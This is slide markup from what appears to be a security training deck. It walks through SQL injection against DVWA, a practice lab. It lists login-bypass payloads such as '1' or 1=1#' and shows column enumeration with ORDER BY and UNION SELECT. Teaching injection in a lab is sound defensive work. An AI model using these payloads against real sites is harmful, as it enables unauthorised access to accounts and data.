              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-228600"/>
            <a:ext cx="8534160" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Login into DVWA (admin | password)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="645" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533520" y="1219320"/>
            <a:ext cx="7924320" cy="5028840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-228600"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Inside DVWA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="647" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="648" name="Picture 5"/>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xtShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-228600"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Input 1,2,3,4,5</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="651" name="Picture 6"/>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Input alphabetics</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="654" name="Picture 4"/>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8610120" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Input any string with a single quote</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="657"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="9067320" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>The webpage produced SQL error</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="660" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="50860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457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>tandem</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The Analyst and the target are prepared for the audit, both knowing in advance all the details of the audit. A tandem audit tests the protection and controls of the target. However, it cannot test the preparedness of the target to unknown variables of agitation. The true nature of the test is thoroughness as the Analyst does have full view of all tests and their responses. The breadth and depth depends upon the quality of the information provided to the Analyst before the test (transparency) as well as the Analyst’s applicable knowledge. This is often known as an In-House Audit or a Crystal Box test and the Analyst is often part of the security process</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270"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271"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272"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4C8ABE59-B79E-4C66-9A07-BF558624F378}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533520" y="5867280"/>
            <a:ext cx="533160" cy="228240"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7A7A7A"/>
          </a:solidFill>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="5A5A5A"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>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28600"/>
            <a:ext cx="7772040" cy="4571640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Sql Bypass Login</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4800600"/>
            <a:ext cx="6857640" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6172200"/>
            <a:ext cx="3428640" cy="304560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>4/10/15</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6492960"/>
            <a:ext cx="3428640" cy="283320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Footer Text</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="TextShape 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8227080" y="5885640"/>
            <a:ext cx="1315440" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" tIns="91440" rIns="45720" bIns="91440" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{4DCD509B-7CEA-4320-AAAC-C09CC69B3EC3}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667"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Try this :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>1’ or 1=1- -</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>1’ or 1=1#</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‘ or 1=1- -</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‘ or 1=1#</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%' or ‘1’=‘1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="670" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5086080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Order By</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>To find the number of columns</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Increasing the ‘ORDER BY’ by 1 until you see an error.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>int i =1;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>For ( i=1, i</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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457200" y="-152280"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>‘ order by 1#</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="675"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a:off x="457200" y="-152280"/>
            <a:ext cx="8915040" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Increment each number until we see an error on the page</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="678" name="Picture 3"/>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8076960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>using “union all select” to union</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="681" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="4495680"/>
            <a:ext cx="837720" cy="304560"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
